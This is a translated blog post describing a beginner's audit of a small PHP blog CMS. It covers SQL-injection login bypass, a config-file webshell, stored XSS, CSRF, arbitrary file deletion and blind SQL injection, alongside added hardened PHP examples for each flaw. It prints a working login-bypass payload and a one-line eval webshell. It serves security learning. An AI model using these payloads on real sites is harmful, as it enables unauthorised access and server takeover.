A Beginner's Look at Practical Code Auditing: Auditing the Latest Version of a Blog System
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">This was my first time formally auditing a CMS. Although it is only a very small blog system (the kind where a submitted report may not even be accepted), and the vulnerabilities are all quite simple, I still picked up a fair amount of experience, so in the end I decided to share it here. I won't name the blog CMS, since it has an official site up... Origin: one day while browsing a friend's blog I happened to notice a small CMS, and since I was bored over the summer break I audited its code (good practice). The problems are fairly serious: many parameters are not filtered at all, and there are many injection points alone. Due to limited space I won't list them one by one; here I will only analyze the most typical vulnerability of each class I found.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Authentication bypass</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">First, right off the bat, a very simple hole: the admin back end can be bypassed with a "universal password" (SQL injection in the login query). The problem is in ad/login.php; let's look at the code first.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcP57JLqkQ2uIt9DicYlmL962h9QfpwGoOXY57aLfrCVrQblY2c4eSPRA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Here the POST and GET parameters are not filtered at all (at first I assumed a global filter had been defined, but after searching for a long time I found none; there is simply no filtering), so the login can be bypassed directly with a universal password:</p>
username=qweq or 1=1#
password=123
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcpfwpsGb3KrgJ4AXwhAKDd56rWV3X9zL98x6m76crEBQdQThhTXInYQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
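The fix for this class of bug, as an added example that is not the CMS's own ad/login.php: the vulnerable shape (request fields concatenated into the SQL text) next to a hardened login that uses a prepared statement and a stored password hash. The table admin(username, password, password_hash) and the in-memory SQLite database are constructed for the demo.

```php
<?php
// Added example, not the CMS's ad/login.php. Assumes a hypothetical table
// admin(username, password, password_hash); SQLite in memory is used for the demo.

// BEFORE: the shape of the vulnerable login. Request fields are concatenated into the SQL
// text, so the input can rewrite the WHERE clause instead of being compared as a value.
function login_vulnerable(PDO $pdo, string $user, string $pass): bool
{
    $sql = "SELECT 1 FROM admin WHERE username='$user' AND password='$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// A fixed bcrypt hash used when the user does not exist, so unknown and known
// usernames take the same time to reject.
function dummy_hash(): string
{
    static $h = null;
    return $h ??= password_hash(bin2hex(random_bytes(8)), PASSWORD_BCRYPT);
}

// AFTER: the statement is compiled before the input is bound, so the input is always a
// value; the password is checked with password_verify() against a stored hash.
function login_safe(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password_hash FROM admin WHERE username = ? LIMIT 1');
    $stmt->execute([$user]);
    $row  = $stmt->fetch(PDO::FETCH_ASSOC);
    $hash = is_array($row) ? $row['password_hash'] : dummy_hash();
    return password_verify($pass, $hash) && is_array($row);
}

// Constructed demo data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password TEXT, password_hash TEXT)');
$ins = $pdo->prepare('INSERT INTO admin VALUES (?, ?, ?)');
$ins->execute(['admin', 's3cret', password_hash('s3cret', PASSWORD_BCRYPT)]);

$tautology = "x' OR 1=1 --";
var_dump(login_vulnerable($pdo, $tautology, 'anything')); // the bypass the audit describes
var_dump(login_safe($pdo, $tautology, 'anything'));       // treated as a literal username, rejected
var_dump(login_safe($pdo, 'admin', 's3cret'));            // the only way in
```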
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Arbitrary file modification leading to getshell</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Once inside the back end, we first browse the features roughly and find a function for editing site information; in the back end, locate the corresponding setconfig.php.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">First let's look at the general format of the form submission.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMccDbKF23wkYOSxCWZKMleMmiazFNiauWc0LgUTlwJE09XIuyJpWia23kLw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Here we can easily see that it does no filtering on our input and simply replaces the contents of the original file with it. Tracing back to the source file:</p>
<img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcSgKYLtrW1BwRAhe8ol6sgDBmpBTwtwLo52ta6vLaj9TibYALwyiaSpqg/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">So we can construct a one-line webshell to insert:</p>
";@eval($_POST);/*
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcOicQf1HPfoYCRyNKQv65KyuFAxMlvGF7lTnIVU3eFy4rF2zDOou1zEw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">Then use Caidao (China Chopper) to connect to the cmsconfig.php file.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">XSS</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Since this is a blog system, the most important module is certainly the one that publishes articles, so we follow it in. The problem is in art.php; first take a rough look at whether the code filters at all.</p>
Adding an article
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcEEzPIKC7E3HMOFYAsm5vHw9gMxmiaFMWx8toicGZp9yYf4DLS4dCfUww/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">At first glance there is no filtering here; next, let's find the form structure.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcS5v2Jbkz0sxCVeZKeNrjn21UUVZsLT3G4AEPlG8vpJQFxxR4apNsdA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Here the $content field is tag-escaped (encoded). After checking the output point I found that this could not be bypassed, so I thought of trying other parameters and found the tags parameter.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The function that adds an article indeed does no filtering, but on reaching the save page I found a catch: the author had defined his own filter function.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc8qKV1icAibyJXIpHRo1cgiaTNKIkyUJ4BUCkSHnDP95FH2d1bDDjnJeQA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Following into the filter function:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcJqdkOicuLGnWMh46jKwyxic6IibYM4DDzYmtNzicwlJfQQUMQtFY4lLTkw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">It does a pile of replacements and I couldn't think of a way around them, so I switched to yet another parameter, title. This time I found that this parameter is not filtered at all; there is merely a warning at input time not to enter special characters.</p>
<img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc6fUib0w5lKy5mHm3ic88tYkQ2KQyYwRHs6Nn2uaJOvqKdZnliamm4ice2w/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Viewing the article from the front end:</p>
<img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcCtxII1UUfh21SAmTOgFhWUhbhZEtuwiaJfibt4yUluE2SrI7KKm1ty6A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Of course, second-order (stored) SQL injection also exists here.</p>
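The lesson of the title/tags/content hunt above is that a per-field blacklist on input is the wrong layer; the added example below (not the CMS's art.php; table and column names are hypothetical) encodes every field at the output point and parameterises the later query that re-uses a stored value, which is the second-order case.

```php
<?php
// Added example, not the CMS's art.php. Encodes at the output point instead of trying to
// strip characters on input; the article table and its columns are hypothetical.

function e(string $s): string
{
    // ENT_QUOTES covers both quote styles (attribute context); ENT_SUBSTITUTE replaces
    // invalid UTF-8 instead of silently returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Every field the page prints goes through e(), title included - the field the audit found
// reaching the page with nothing but a "no special characters" warning at input time.
function render_article(array $a): string
{
    $tags = array_map('e', array_filter(array_map('trim', explode(',', $a['tags']))));
    return '<h1>' . e($a['title']) . "</h1>\n"
         . '<p class="tags" data-tags="' . e($a['tags']) . '">' . implode(', ', $tags) . "</p>\n"
         . '<div>' . e($a['content']) . "</div>\n";
}

// Second-order injection: a stored value is just as untrusted when it is read back out of
// the database and used in a later query, so that query is parameterised too.
function related_by_tags(PDO $pdo, string $storedTags): array
{
    $stmt = $pdo->prepare('SELECT id, title FROM article WHERE tags = ? ORDER BY id DESC');
    $stmt->execute([$storedTags]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed row with a script tag in the title: it is rendered as text, not executed.
$article = [
    'title'   => '<script>alert(1)</script>',
    'tags'    => 'php, audit',
    'content' => 'body text',
];
echo render_article($article);
```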
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">CSRF</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The problem is in /ad/admin.php; the key code is as follows:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcKks9g1DAO310QYhILz5yjVbLy0jKcicxLENH7F2ViaOaeOe4Wl3p1a1A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">No token check is done here, so a CSRF vulnerability is likely. We capture the request with Burp:</p>
<img src="http://mmbiz.qpic.cn/mmbiz_jpg/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMchrHbcvpzS2409ANMKzJ6Uxgibep62nlcsEUmE4BtuccJpzHQzQzUttw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">A small trick here: Burp can generate the CSRF PoC page directly.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">After generating it, drop the request. First let's see how many administrators we have:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcMRWjCG6eKnWWbg5wict7ib0qkJTkAibsdtXG1obk5ctsgHthfxRuyWxSw/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Click submit on the HTML page:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMceqkSmEcwXBNOkRO6GxQQQNic2rcDpSfq7x1icqLn35gVafyYUMYRIGgQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Then look at the administrators again:</p>
<img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcT56pQHs7rkPia0RHvOic0y7sf2HflicUXcgLu4qs2Q2B3zb1WV9nSujVg/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
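The token check the audit found missing, as an added example that is not the CMS's /ad/admin.php: a per-session random token embedded in every state-changing form and compared in constant time on submit, with a SameSite cookie as defence in depth. The `act=addadmin` handler is hypothetical.

```php
<?php
// Added example, not the CMS's /ad/admin.php. Adds the token check the audit found missing;
// the add-admin handler and its `act` parameter are hypothetical.

// SameSite=Lax is defence in depth: the browser omits the session cookie on cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));  // 256 random bits per session
    }
    return $_SESSION['csrf'];
}

// Emit this inside every state-changing form; a page generated off-site cannot know its value.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// hash_equals() compares in constant time, so the check leaks nothing about the real token.
function csrf_valid(array $post, array $session): bool
{
    return isset($post['csrf'], $session['csrf'])
        && is_string($post['csrf'])
        && hash_equals($session['csrf'], $post['csrf']);
}

// Guard: every POST that changes state is checked before any work is done.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && ($_GET['act'] ?? '') === 'addadmin') {
    if (!csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('invalid or missing CSRF token');
    }
    // ... create the administrator with a prepared statement here
}
```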
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Arbitrary file deletion</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The problem is in /app/dbbackup/index.php.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The key code is as follows:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMc60zBPcYoQHoP9icxXUbs1OkhBGL9VGVpOJyY9JZ78rrR1iaN3q9VFxYA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">One glance here is enough to see the issue: the p parameter is user-controlled and not filtered, so any file can be deleted directly. This kind of arbitrary file deletion can usually be used to delete install.lock and thereby cause a reinstallation vulnerability; this blog system, however, automatically deletes the install page once installation completes, so that vulnerability does not exist here for now.</p>
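How a backup-deletion endpoint keeps `p` inside its own directory, as an added example that is not the CMS's /app/dbbackup/index.php (the backup directory and the `.sql` naming are hypothetical): the name is reduced to a bare file name, matched against the pattern the feature itself produces, and the resolved path is required to sit under the backup root before unlink() runs.

```php
<?php
// Added example, not the CMS's /app/dbbackup/index.php. Backup directory and file
// extension are hypothetical.
const BACKUP_DIR = __DIR__ . '/backup';

// BEFORE: the shape the audit describes - unlink() on whatever arrives in `p`.
function delete_backup_vulnerable(string $p): bool
{
    return @unlink($p);
}

// AFTER: treat `p` as a bare file name, never as a path, and prove the resolved target
// lives inside BACKUP_DIR before touching it.
function delete_backup_safe(string $p): bool
{
    $name = basename($p);                          // drops any directory component
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.sql$/', $name)) {
        return false;                              // only names this feature itself creates
    }
    $root = realpath(BACKUP_DIR);
    $full = realpath(BACKUP_DIR . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks too, so a link planted in the directory that points
    // elsewhere fails the prefix check instead of having its target deleted.
    if ($root === false || $full === false
        || strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;
    }
    return is_file($full) && unlink($full);
}

// Constructed demo: a traversal-style name is refused before any filesystem access.
var_dump(delete_backup_safe('../../install.lock'));  // basename() leaves "install.lock", which fails the pattern
```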
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">SQL injection</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The problem is in hit.php; the key code is as follows:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcvynRuYOIdlAibRp6GVTuf0xo2xSdHYkibDu37GpS0z526fde01IG30AQ/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Seeing this, many readers might assume that id is under our control and not filtered at all, but in fact the author does filter here; the key point is this:</p>
<img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcSgwsgiaiaZ6A6JISRxA7atZuVevXhlPn1PKfuI6KXUDqc0yvfm9AqlDA/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">It calls the sqlguolv function from c_other.php; let's follow it in.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Key code:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcy0Te1Ijwg1sfERj2B0ibWV3LccIFUhH0ZZqibe0j5u8VxwdLgbJiagzag/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">Here it compares $_SERVER against a list of keywords, which provides some filtering, but the filtering is incomplete and we can still get past it with blind injection.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">The bypass is very simple; I'll only paste one payload here:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="http://mmbiz.qpic.cn/mmbiz_png/lNJRrWgETdjt8JSl9KaeBPJf5A0l8rMcRlHiaUuKNl9rmJ4UxibQoGhsbwSpgE0IGbDHWO2B4TvcUySWxKgqzl9A/640?tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">I couldn't be bothered to write a script.</p>
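Why the sqlguolv-style keyword check is the wrong layer for hit.php, as an added example (not the CMS's hit.php or c_other.php; the keyword list and the article table are constructed): the blacklist only knows the words on its list and still hands the raw value to the SQL text, whereas validating the id as an integer and binding it leaves no SQL token to filter.

```php
<?php
// Added example, not the CMS's hit.php / c_other.php. The keyword list is constructed to
// show the shape of a sqlguolv()-style check; the article table is hypothetical.

// BEFORE: a blacklist run over the raw request. It only knows the words on its list, it
// does not know what the value is for, and the raw value is then still used in the SQL text.
function keyword_filter(string $queryString): bool
{
    foreach (['select', 'union', 'sleep', 'benchmark'] as $kw) {
        if (stripos($queryString, $kw) !== false) {
            return false;
        }
    }
    return true;
}

function hit_vulnerable(PDO $pdo, string $queryString, string $id): int
{
    if (!keyword_filter($queryString)) {
        return 0;
    }
    return $pdo->exec("UPDATE article SET hits = hits + 1 WHERE id = $id");
}

// AFTER: an article id can only ever be a positive integer, so enforce that type before it
// gets near the query, then bind it. No keyword list is needed: no SQL token can survive.
function hit_safe(PDO $pdo, $rawId): int
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 0;                                  // 400 Bad Request in a real handler
    }
    $stmt = $pdo->prepare('UPDATE article SET hits = hits + 1 WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed demo data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE article (id INTEGER PRIMARY KEY, hits INTEGER NOT NULL DEFAULT 0)');
$pdo->exec('INSERT INTO article (id) VALUES (1), (2), (3)');

var_dump(hit_safe($pdo, '2'));                                // only article 2 is touched
var_dump(hit_safe($pdo, '2 OR 1=1'));                         // not an integer: refused, no query runs
var_dump(hit_vulnerable($pdo, 'id=2 OR 1=1', '2 OR 1=1'));    // passes the blacklist, bumps every row
```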
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">To sum up: code auditing still comes down to the same two old approaches. The first is reading through the whole code base; the benefit is that you can dig out logic vulnerabilities such as race conditions. The second is a direct global search: find the key functions, check whether the variables are controllable, whether any filtering exists, and so on. For beginners, in my opinion the fastest way in is to pick an old CMS and try auditing it yourself: generally you find the PHP page from the front end (browser), then find the corresponding PHP source in the back end, and focus on the dangerous functions and WAF functions to see whether a bypass is possible.</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Author:</strong> Pupil</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Title:</strong> A Beginner's Look at Practical Code Auditing: Auditing the Latest Version of a Blog System</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Link:</strong> http://pupiles.com/code-check.html</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Published:</strong> 8 August 2017, 12:08</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Copyright notice:</strong></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">This article is an original work by Pupil, licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International license. Please keep the above notice when reposting.</p>